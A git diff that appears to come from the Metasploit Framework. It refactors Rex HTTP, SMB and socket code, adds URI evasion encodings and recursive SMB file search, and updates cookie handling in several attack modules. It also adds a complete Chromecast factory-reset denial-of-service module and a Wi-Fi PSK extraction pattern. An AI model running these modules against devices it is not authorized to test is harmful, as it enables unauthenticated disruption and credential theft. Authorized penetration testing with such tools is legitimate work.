+    'uri_encode_mode'        => 'hex-normal', # hex-normal, hex-all, hex-noslashes, hex-random, u-normal, u-all, u-noslashes, u-random
     'uri_encode_count'       => 1,       # integer
     'uri_full_url'           => false,   # bool
     'pad_method_uri_count'   => 1,       # integer
@@ -112,12 +112,16 @@ class ClientRequest
 
       opts['vars_get'].each_pair do |var,val|
         var = var.to_s
-        val = val.to_s
 
         qstr << '&' if qstr.length > 0
         qstr << (opts['encode_params'] ? set_encode_uri(var) : var)
-        qstr << '='
-        qstr << (opts['encode_params'] ? set_encode_uri(val) : val)
+        # support get parameter without value
+        # Example: uri?parameter
+        if val
+          val = val.to_s
+          qstr << '='
+          qstr << (opts['encode_params'] ? set_encode_uri(val) : val)
+        end
       end
 
       if (opts['pad_post_params'])
diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb
index 71f1c1a8ae..1a08d13264 100644
--- a/lib/rex/proto/http/response.rb
+++ b/lib/rex/proto/http/response.rb
@@ -67,7 +67,7 @@ class Response < Packet
     cookies = ""
     if (self.headers.include?('Set-Cookie'))
       set_cookies = self.headers['Set-Cookie']
-      key_vals = set_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?);/)
+      key_vals = set_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)
       key_vals.each do |k, v|
         # Dont downcase actual cookie name as may be case sensitive
         name = k.downcase
diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb
index 6442284688..6007f16c8b 100644
--- a/lib/rex/proto/smb/client.rb
+++ b/lib/rex/proto/smb/client.rb
@@ -150,72 +150,116 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
     packet.v['ProcessID'] = self.process_id.to_i
   end
 
-
-  # The main dispatcher for all incoming SMB packets
-  def smb_recv_parse(expected_type, ignore_errors = false)
+  # Receive a full SMB reply and cache the parsed packet
+  def smb_recv_and_cache
+    @smb_recv_cache ||= []
 
     # This will throw an exception if it fails to read the whole packet
     data = self.smb_recv
 
     pkt = CONST::SMB_BASE_PKT.make_struct
     pkt.from_s(data)
-    res  = pkt
+
+    # Store the received packet into the cache
+    @smb_recv_cache << [ pkt, data, Time.now ]
+  end
+
+  # Scan the packet receive cache for a matching response
+  def smb_recv_cache_find_match(expected_type)
+    
+    clean = []
+    found = nil
+
+    @smb_recv_cache.each do |cent|
+      pkt, data, tstamp = cent
+
+      # Return matching packets and mark for removal 
+      if pkt['Payload']['SMB'].v['Command'] == expected_type
+        found = [pkt,data]
+        clean << cent
+      end
+
+      # Purge any packets older than 5 minutes
+      if Time.now.to_i - tstamp.to_i > 300
+        clean << cent
+      end
+
+      break if found
+    end
+
+    clean.each do |cent|
+      @smb_recv_cache.delete(cent)
+    end
+
+    found
+  end
+
+  # The main dispatcher for all incoming SMB packets
+  def smb_recv_parse(expected_type, ignore_errors = false)
+
+    pkt  = nil
+    data = nil
+
+    # This allows for some leeway when a previous response has not
+    # been processed but a new request was sent. The old response
+    # will eventually be timed out of the cache.
+    1.upto(3) do |attempt|
+      smb_recv_and_cache
+      pkt,data = smb_recv_cache_find_match(expected_type)
+      break if pkt
+    end
 
     begin
       case pkt['Payload']['SMB'].v['Command']
 
         when CONST::SMB_COM_NEGOTIATE
-          res =  smb_parse_negotiate(pkt, data)
+          res = smb_parse_negotiate(pkt, data)
 
         when CONST::SMB_COM_SESSION_SETUP_ANDX
-          res =  smb_parse_session_setup(pkt, data)
+          res = smb_parse_session_setup(pkt, data)
 
         when CONST::SMB_COM_TREE_CONNECT_ANDX
-          res =  smb_parse_tree_connect(pkt, data)
+          res = smb_parse_tree_connect(pkt, data)
 
         when CONST::SMB_COM_TREE_DISCONNECT
-          res =  smb_parse_tree_disconnect(pkt, data)
+          res = smb_parse_tree_disconnect(pkt, data)
 
         when CONST::SMB_COM_NT_CREATE_ANDX
-          res =  smb_parse_create(pkt, data)
+          res = smb_parse_create(pkt, data)
 
         when CONST::SMB_COM_TRANSACTION, CONST::SMB_COM_TRANSACTION2
-          res =  smb_parse_trans(pkt, data)
+          res = smb_parse_trans(pkt, data)
 
         when CONST::SMB_COM_NT_TRANSACT
-          res =  smb_parse_nttrans(pkt, data)
+          res = smb_parse_nttrans(pkt, data)
 
         when CONST::SMB_COM_NT_TRANSACT_SECONDARY
-          res =  smb_parse_nttrans(pkt, data)
+          res = smb_parse_nttrans(pkt, data)
 
         when CONST::SMB_COM_OPEN_ANDX
-          res =  smb_parse_open(pkt, data)
+          res = smb_parse_open(pkt, data)
 
         when CONST::SMB_COM_WRITE_ANDX
-          res =  smb_parse_write(pkt, data)
+          res = smb_parse_write(pkt, data)
 
         when CONST::SMB_COM_READ_ANDX
-          res =  smb_parse_read(pkt, data)
+          res = smb_parse_read(pkt, data)
 
         when CONST::SMB_COM_CLOSE
-          res =  smb_parse_close(pkt, data)
+          res = smb_parse_close(pkt, data)
 
         when CONST::SMB_COM_DELETE
-          res =  smb_parse_delete(pkt, data)
+          res = smb_parse_delete(pkt, data)
 
         else
           raise XCEPT::InvalidCommand
       end
 
-      if (pkt['Payload']['SMB'].v['Command'] != expected_type)
-        raise XCEPT::InvalidType
-      end
-
       if (ignore_errors == false and pkt['Payload']['SMB'].v['ErrorClass'] != 0)
         raise XCEPT::ErrorCode
       end
 
-    rescue XCEPT::InvalidWordCount, XCEPT::InvalidCommand, XCEPT::InvalidType, XCEPT::ErrorCode
+    rescue XCEPT::InvalidWordCount, XCEPT::InvalidCommand, XCEPT::ErrorCode
         $!.word_count = pkt['Payload']['SMB'].v['WordCount']
         $!.command = pkt['Payload']['SMB'].v['Command']
         $!.error_code = pkt['Payload']['SMB'].v['ErrorClass']
@@ -1837,88 +1881,150 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
       0,   # Storage type is zero
     ].pack('vvvvV') + path + "\x00"
 
-    begin
-      resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '')
-      search_next = 0
-      begin
-        pcnt = resp['Payload'].v['ParamCount']
-        dcnt = resp['Payload'].v['DataCount']
-        poff = resp['Payload'].v['ParamOffset']
-        doff = resp['Payload'].v['DataOffset']
+    resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '')
+    search_next = 0
 
-        # Get the raw packet bytes
-        resp_rpkt = resp.to_s
+    # Loop until we run out of results
+    loop do
+      pcnt = resp['Payload'].v['ParamCount']
+      dcnt = resp['Payload'].v['DataCount']
+      poff = resp['Payload'].v['ParamOffset']
+      doff = resp['Payload'].v['DataOffset']
 
-        # Remove the NetBIOS header
-        resp_rpkt.slice!(0, 4)
+      # Get the raw packet bytes
+      resp_rpkt = resp.to_s
 
-        resp_parm = resp_rpkt[poff, pcnt]
-        resp_data = resp_rpkt[doff, dcnt]
+      # Remove the NetBIOS header
+      resp_rpkt.slice!(0, 4)
 
-        if search_next == 0
-          # search id, search count, end of search, error offset, last name offset
-          sid, scnt, eos, eoff, loff = resp_parm.unpack('v5')
-        else
-          # FINX_NEXT doesn't return a SID
-          scnt, eos, eoff, loff = resp_parm.unpack('v4')
-        end
-        didx = 0
-        while (didx < resp_data.length)
-          info_buff = resp_data[didx, 70]
-          break if info_buff.length != 70
-          info = info_buff.unpack(
-            'V'+	# Next Entry Offset
-            'V'+	# File Index
-            'VV'+	# Time Create
-            'VV'+	# Time Last Access
-            'VV'+	# Time Last Write
-            'VV'+	# Time Change
-            'VV'+	# End of File
-            'VV'+	# Allocation Size
-            'V'+	# File Attributes
-            'V'+	# File Name Length
-            'V'+	# Extended Attr List Length
-            'C'+	# Short File Name Length
-            'C' 	# Reserved
-          )
-          name = resp_data[didx + 70 + 24, info[15]].sub(/\x00+$/n, '')
-          files[name] =
-          {
-            'type' => ((info[14] & 0x10)==0x10) ? 'D' : 'F',
-            'attr' => info[14],
-            'info' => info
-          }
+      resp_parm = resp_rpkt[poff, pcnt]
+      resp_data = resp_rpkt[doff, dcnt]
 
-          break if info[0] == 0
-          didx += info[0]
-        end
-        last_search_id = sid
-        last_offset = loff
-        last_filename = name
-        if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next
-          resp = find_next(last_search_id, last_offset, last_filename)
-          search_next = 1 # Flip bit so response params will parse correctly
-        end
-      end until eos != 0 or last_offset == 0
-    rescue ::Exception
-      raise $!
+      if search_next == 0
+        # search id, search count, end of search, error offset, last name offset
+        sid, scnt, eos, eoff, loff = resp_parm.unpack('v5')
+      else
+        # FIND_NEXT doesn't return a SID
+        scnt, eos, eoff, loff = resp_parm.unpack('v4')
+      end
+
+      didx = 0
+      while (didx < resp_data.length)
+        info_buff = resp_data[didx, 70]
+        break if info_buff.length != 70
+
+        info = info_buff.unpack(
+          'V'+	# Next Entry Offset
+          'V'+	# File Index
+          'VV'+	# Time Create
+          'VV'+	# Time Last Access
+          'VV'+	# Time Last Write
+          'VV'+	# Time Change
+          'VV'+	# End of File
+          'VV'+	# Allocation Size
+          'V'+	# File Attributes
+          'V'+	# File Name Length
+          'V'+	# Extended Attr List Length
+          'C'+	# Short File Name Length
+          'C' 	# Reserved
+        )
+
+        name = resp_data[didx + 70 + 24, info[15]]
+
+        # Verify that the filename was actually present
+        break unless name
+
+        # Key the file list minus any trailing nulls
+        files[name.sub(/\x00+$/n, '')] =
+        {
+          'type' => ( info[14] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY == 0 ) ? 'F' : 'D',
+          'attr' => info[14],
+          'info' => info
+        }
+
+        break if info[0] == 0
+        didx += info[0]
+      end
+
+      last_search_id = sid
+      last_offset    = loff
+      last_filename  = name
+
+      # Exit the search if we reached the end of our results
+      break if (eos != 0 or last_search_id.nil? or last_offset.to_i == 0)
+
+      # If we aren't at the end of the search, run find_next
+      resp = find_next(last_search_id, last_offset, last_filename)
+
+      # Flip bit so response params will parse correctly
+      search_next = 1 
     end
 
-    return files
+    files
   end
 
   # Supplements find_first if file/dir count exceeds max search count
   def find_next(sid, resume_key, last_filename)
 
     parm = [
-      sid, # Search ID
-      20, # Maximum search count (Size of 20 keeps response to 1 packet)
-      260, # Level of interest
-      resume_key,   # Resume key from previous (Last name offset)
-      6,   # Close search if end of search
-    ].pack('vvvVv') + last_filename.to_s + "\x00" # Last filename returned from find_first or find_next
-    resp = trans2(CONST::TRANS2_FIND_NEXT2, parm, '')
-    return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function
+      sid,                # Search ID
+      20,                 # Maximum search count (Size of 20 keeps response to 1 packet)
+      260,                # Level of interest
+      resume_key,         # Resume key from previous (Last name offset)
+      6,                  # Close search if end of search
+    ].pack('vvvVv') + 
+    last_filename.to_s +  # Last filename returned from find_first or find_next
+    "\x00"                # Terminate the file name
+
+    # Returns the FIND_NEXT2 response packet for parsing by the find_first function
+    trans2(CONST::TRANS2_FIND_NEXT2, parm, '')
+  end
+
+  # Recursively search for files matching a regular expression
+  def file_search(current_path, regex, depth)
+    depth -= 1
+    return [] if depth < 0
+
+    results = find_first(current_path + "*")
+    files = []
+
+    results.each_pair do |fname, finfo|
+
+      # Skip current and parent directory results
+      next if %W{. ..}.include?(fname)
+
+      # Verify the results contain an attribute
+      next unless finfo and finfo['attr']
+
+      if finfo['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY == 0
+        # Add any matching files to our result set
+        files << "#{current_path}#{fname}" if fname =~ regex
+      else
+        # Recurse into the discovery subdirectory for more files
+        begin
+          search_path = "#{current_path}#{fname}\\"
+          file_search(search_path, regex, depth).each {|fn| files << fn }
+        rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+          
+          # Ignore common errors related to permissions and non-files
+          if %W{
+            STATUS_ACCESS_DENIED
+            STATUS_NO_SUCH_FILE
+            STATUS_OBJECT_NAME_NOT_FOUND
+            STATUS_OBJECT_PATH_NOT_FOUND
+            }.include? e.get_error(e.error_code)
+            next
+          end
+
+          $stderr.puts [e, e.get_error(e.error_code), search_path]
+
+          raise e
+        end
+      end
+
+    end
+
+    files.uniq
   end
 
   # Creates a new directory on the mounted tree
@@ -1931,9 +2037,8 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
 # public read/write methods
   attr_accessor	:native_os, :native_lm, :encrypt_passwords, :extended_security, :read_timeout, :evasion_opts
   attr_accessor	:verify_signature, :use_ntlmv2, :usentlm2_session, :send_lm, :use_lanman_key, :send_ntlm
-  attr_accessor  	:system_time, :system_zone
-  #misc
-  attr_accessor   :spnopt # used for SPN
+  attr_accessor :system_time, :system_zone
+  attr_accessor :spnopt
 
 # public read methods
   attr_reader		:dialect, :session_id, :challenge_key, :peer_native_lm, :peer_native_os
@@ -1941,21 +2046,18 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
   attr_reader		:multiplex_id, :last_tree_id, :last_file_id, :process_id, :last_search_id
   attr_reader		:dns_host_name, :dns_domain_name
   attr_reader		:security_mode, :server_guid
-  #signing related
   attr_reader		:sequence_counter,:signing_key, :require_signing
 
-# private methods
+# private write methods
   attr_writer		:dialect, :session_id, :challenge_key, :peer_native_lm, :peer_native_os
   attr_writer		:default_domain, :default_name, :auth_user, :auth_user_id
   attr_writer		:dns_host_name, :dns_domain_name
   attr_writer		:multiplex_id, :last_tree_id, :last_file_id, :process_id, :last_search_id
   attr_writer		:security_mode, :server_guid
-  #signing related
   attr_writer		:sequence_counter,:signing_key, :require_signing
 
   attr_accessor	:socket
 
-
 end
 end
 end
diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb
index c423aee9d8..8de82fd4dd 100644
--- a/lib/rex/proto/smb/constants.rb
+++ b/lib/rex/proto/smb/constants.rb
@@ -261,6 +261,23 @@ FILE_FILE_COMPRESSION = 0x00000008
 FILE_VOLUME_QUOTAS = 0x00000010
 FILE_VOLUME_IS_COMPRESSED = 0x00008000
 
+# SMB_EXT_FILE_ATTR
+# http://msdn.microsoft.com/en-us/library/ee878573(prot.20).aspx
+SMB_EXT_FILE_ATTR_READONLY = 0x00000001
+SMB_EXT_FILE_ATTR_HIDDEN = 0x00000002
+SMB_EXT_FILE_ATTR_SYSTEM = 0x00000004
+SMB_EXT_FILE_ATTR_DIRECTORY = 0x00000010
+SMB_EXT_FILE_ATTR_ARCHIVE = 0x00000020
+SMB_EXT_FILE_ATTR_NORMAL = 0x00000080
+SMB_EXT_FILE_ATTR_TEMPORARY = 0x00000100
+SMB_EXT_FILE_ATTR_COMPRESSED = 0x00000800
+SMB_EXT_FILE_POSIX_SEMANTICS = 0x01000000
+SMB_EXT_FILE_BACKUP_SEMANTICS = 0x02000000
+SMB_EXT_FILE_DELETE_ON_CLOSE = 0x04000000
+SMB_EXT_FILE_SEQUENTIAL_SCAN = 0x08000000
+SMB_EXT_FILE_RANDOM_ACCESS = 0x10000000
+SMB_EXT_FILE_NO_BUFFERING = 0x20000000
+SMB_EXT_FILE_WRITE_THROUGH = 0x80000000
 
 # SMB Error Codes
 SMB_STATUS_SUCCESS =			0x00000000
diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb
index e68a0263a6..1bdf2d0cca 100644
--- a/lib/rex/socket.rb
+++ b/lib/rex/socket.rb
@@ -505,14 +505,24 @@ module Socket
   end
 
   #
-  # Converts a port specification like "80,21-23,443" into a sorted,
-  # unique array of valid port numbers like [21,22,23,80,443]
+  # Converts a port specification like "80,21-25,!24,443" into a sorted,
+  # unique array of valid port numbers like [21,22,23,25,80,443]
   #
   def self.portspec_to_portlist(pspec)
     ports = []
+    remove = []
 
     # Build ports array from port specification
     pspec.split(/,/).each do |item|
+      target = ports
+
+      item.strip!
+
+      if item.start_with? '!'
+        item.delete! '!'
+        target = remove
+      end
+
       start, stop = item.split(/-/).map { |p| p.to_i }
 
       start ||= 0
@@ -520,11 +530,15 @@ module Socket
 
       start, stop = stop, start if stop < start
 
-      start.upto(stop) { |p| ports << p }
+      start.upto(stop) { |p| target << p }
+    end
+
+    if ports.empty? and not remove.empty? then
+      ports = 1.upto 65535
     end
 
     # Sort, and remove dups and invalid ports
-    ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 }
+    ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 or remove.include? p }
   end
 
   #
diff --git a/lib/rex/test.rb b/lib/rex/test.rb
deleted file mode 100644
index 380e85817d..0000000000
--- a/lib/rex/test.rb
+++ /dev/null
@@ -1,36 +0,0 @@
-# -*- coding: binary -*-
-require 'test/unit'
-
-# DEFAULTS
-module Rex
-class Test
-
-$_REX_TEST_NO_MOCK = nil
-$_REX_TEST_TIMEOUT = 30
-$_REX_TEST_SMB_HOST = '10.4.10.58'
-$_REX_TEXT_SMB_USER = 'SMBTest'
-$_REX_TEXT_SMB_PASS = 'SMBTest'
-
-# overwrite test defaults with rex/test-config.rb
-def self.load()
-    file = File.join( ENV.fetch('HOME'), '.msf3', 'test')
-    begin
-        if File.stat(file + '.rb')
-            require file
-        end
-    rescue
-        # just ignore the errors
-    end
-
-end
-
-def self.cantmock()
-    if (!$_REX_TEST_NO_MOCK)
-        raise RuntimeError, "*** $_REX_TEST_NO_MOCK must not be set for this test ***", caller
-    end
-end
-
-Rex::Test.load()
-
-end
-end
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index 74b6fb33d2..d33bdf18b0 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -777,15 +777,18 @@ module Text
 
     return str if mode == 'none' # fast track no encoding
 
-    all = /[^\/\\]+/
+    all = /./
+    noslashes = /[^\/\\]+/
     # http://tools.ietf.org/html/rfc3986#section-2.3
     normal = /[^a-zA-Z0-9\/\\\.\-_~]+/
 
     case mode
-    when 'hex-normal'
-      return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') }
     when 'hex-all'
       return str.gsub(all) { |s| Rex::Text.to_hex(s, '%') }
+    when 'hex-normal'
+      return str.gsub(normal) { |s| Rex::Text.to_hex(s, '%') }
+    when 'hex-noslashes'
+      return str.gsub(noslashes) { |s| Rex::Text.to_hex(s, '%') }
     when 'hex-random'
       res = ''
       str.each_byte do |c|
@@ -795,10 +798,12 @@ module Text
           b.gsub(normal){ |s| Rex::Text.to_hex(s, '%') } )
       end
       return res
-    when 'u-normal'
-      return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
     when 'u-all'
       return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
+    when 'u-normal'
+      return str.gsub(normal) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
+    when 'u-noslashes'
+      return str.gsub(noslashes) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms'), '%u', 2) }
     when 'u-random'
       res = ''
       str.each_byte do |c|
@@ -1279,6 +1284,30 @@ module Text
     "{#{[8,4,4,4,12].map {|a| rand_text_hex(a) }.join("-")}}"
   end
 
+  #
+  # Convert 16-byte string to a GUID string
+  #
+  # @example
+  #   str = "ABCDEFGHIJKLMNOP"
+  #   Rex::Text.to_guid(str) #=> "{44434241-4645-4847-494a-4b4c4d4e4f50}"
+  #
+  # @param bytes [String] 16 bytes which represent a GUID in the proper
+  #   order.
+  #
+  # @return [String]
+  def self.to_guid(bytes)
+    return nil unless bytes
+    s = bytes.unpack('H*')[0]
+    parts = [
+      s[6,  2] + s[4,  2] + s[2, 2] + s[0, 2],
+      s[10, 2] + s[8,  2],
+      s[14, 2] + s[12, 2],
+      s[16, 4],
+      s[20, 12]
+    ]
+    "{#{parts.join('-')}}"
+  end
+
   #
   # Creates a pattern that can be used for offset calculation purposes.  This
   # routine is capable of generating patterns using a supplied set and a
diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb
index 2d37d2d45c..d44d0d6b5f 100644
--- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb
+++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb
@@ -130,7 +130,8 @@ class Metasploit3 < Msf::Auxiliary
       }, 25)
 
       if res and res.code == 200
-        if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
+        cookies = res.get_cookies
+        if cookies && cookies.match(/(.*); path=\//)
           cookie= $1
           print_status("Got cookie #{cookie}. Password reset was successful!\n")
         end
diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb
new file mode 100644
index 0000000000..43d4580fb3
--- /dev/null
+++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb
@@ -0,0 +1,58 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chromecast Factory Reset DoS',
+      'Description' => %q{
+        This module performs a factory reset on a Chromecast, causing a denial of service (DoS).
+        No user authentication is required.
+      },
+      'Author' => ['wvu'],
+      'References' => [
+        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
+      ],
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(8008)
+    ], self.class)
+  end
+
+  def run
+    res = reset
+
+    if res && res.code == 200
+      print_good('Factory reset performed')
+    elsif res
+      print_error("An error occurred: #{res.code} #{res.message}")
+    end
+  end
+
+  def reset
+    begin
+      send_request_raw(
+        'method' => 'POST',
+        'uri' => '/setup/reboot',
+        'agent' => Rex::Text.rand_text_english(rand(42) + 1),
+        'ctype' => 'application/json',
+        'data' => '{"params": "fdr"}'
+      )
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    ensure
+      disconnect
+    end
+  end
+
+end
diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb
new file mode 100644
index 0000000000..5036ee0b54
--- /dev/null
+++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Chromecast YouTube Remote Control',
+      'Description' => %q{
+        This module acts as a simple remote control for Chromecast YouTube.
+      },
+      'Author' => ['wvu'],
+      'References' => [
+        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website
+      ],
+      'License' => MSF_LICENSE,
+      'Actions' => [
+        ['Play', 'Description' => 'Play video'],
+        ['Stop', 'Description' => 'Stop video']
+      ],
+      'DefaultAction' => 'Play'
+    ))
+
+    register_options([
+      Opt::RPORT(8008),
+      OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
+    ], self.class)
+  end
+
+  def run
+    vid = datastore['VID']
+
+    case action.name
+    when 'Play'
+      res = play(vid)
+    when 'Stop'
+      res = stop
+    end
+
+    return unless res
+
+    case res.code
+    when 201
+      print_good("Playing https://www.youtube.com/watch?v=#{vid}")
+    when 200
+      print_status("Stopping video")
+    when 404
+      print_error("Couldn't #{action.name.downcase} video")
+    end
+  end
+
+  def play(vid)
+    begin
+      send_request_cgi(
+        'method' => 'POST',
+        'uri' => '/apps/YouTube',
+        'agent' => Rex::Text.rand_text_english(rand(42) + 1),
+        'vars_post' => {
+          'v' => vid
+        }
+      )
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    ensure
+      disconnect
+    end
+  end
+
+  def stop
+    begin
+      send_request_raw(
+        'method' => 'DELETE',
+        'uri' => '/apps/YouTube',
+        'agent' => Rex::Text.rand_text_english(rand(42) + 1)
+      )
+    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
+           Rex::HostUnreachable => e
+      fail_with(Failure::Unreachable, e)
+    ensure
+      disconnect
+    end
+  end
+
+end
diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb
index 2b3e656c44..00ac0f0404 100644
--- a/modules/auxiliary/admin/http/axigen_file_access.rb
+++ b/modules/auxiliary/admin/http/axigen_file_access.rb
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 303 and res.headers['Location'] =~ /_h=([a-f0-9]*)/
       @token = $1
-      if res.headers['Set-Cookie'] =~ /_hadmin=([a-f0-9]*)/
+      if res.get_cookies =~ /_hadmin=([a-f0-9]*)/
         @session = $1
         return true
       end
diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb
index 633e009fe4..15a995d8a0 100644
--- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb
+++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb
@@ -113,7 +113,7 @@ class Metasploit4 < Msf::Auxiliary
       print_error($1)
       return
     else
-      session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/
+      session = $1 if res.get_cookies =~ /_vmdb_session=(\h*)/
 
       if session.nil?
         print_error('Failed to retrieve the current session id')
diff --git a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb
index bdd15b4d30..e838b4d12c 100644
--- a/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb
+++ b/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb
@@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary
       print_error('Authentication failed')
       return
     else
-      session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
+      session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/
 
       if session.nil?
         print_error('Failed to retrieve the current session id')
diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
index 35d9cbef28..c6ccab6c40 100644
--- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
+++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
@@ -23,7 +23,8 @@ class Metasploit4 < Msf::Auxiliary
       'References'     =>
         [
           ['CVE', '2013-2143'],
-          ['CWE', '862']
+          ['CWE', '862'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849']
         ],
       'DisclosureDate' => 'Mar 24 2014'
     )
diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
index 32c3ce4654..dc262ee55a 100644
--- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
+++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
         'method' => 'GET'
       })
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+    if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/
       first_session = $1
     end
 
@@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary
       'cookie' => "JSESSIONID=#{first_session}"
     })
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+    if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/
       @session = $1
       return true
     end
diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb
index b40fb44141..ecc0464e17 100644
--- a/modules/auxiliary/admin/http/tomcat_administration.rb
+++ b/modules/auxiliary/admin/http/tomcat_administration.rb
@@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary
               'uri'     => '/admin/',
             }, 25)
 
-            if (res and res.code == 200)
+            if res && res.code == 200
 
-              if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i))
+              if res.get_cookies.match(/JSESSIONID=(.*);(.*)/i)
 
                 jsessionid = $1
 
diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
index 35f7127993..726e183d8b 100644
--- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
@@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary
       ['Wifi Key 1', /wifi_key1=(\S+)/i],
       ['Wifi Key 2', /wifi_key2=(\S+)/i],
       ['Wifi Key 3', /wifi_key3=(\S+)/i],
-      ['Wifi Key 4', /wifi_key4=(\S+)/i]
+      ['Wifi Key 4', /wifi_key4=(\S+)/i],
+      ['Wifi PSK PWD', /wifi_psk_pwd=(\S+)/i]
     ]
   }
 
diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb
index 698fffa2c9..09375cf627 100644
--- a/modules/auxiliary/admin/mssql/mssql_enum.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
         module to work, valid administrative user credentials must be
         supplied.
       },
-      'Author'         => [ 'Carlos Perez <carlos_perez [at] darkoperator.com>' ],
+      'Author'         => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
       'License'        => MSF_LICENSE
     ))
   end
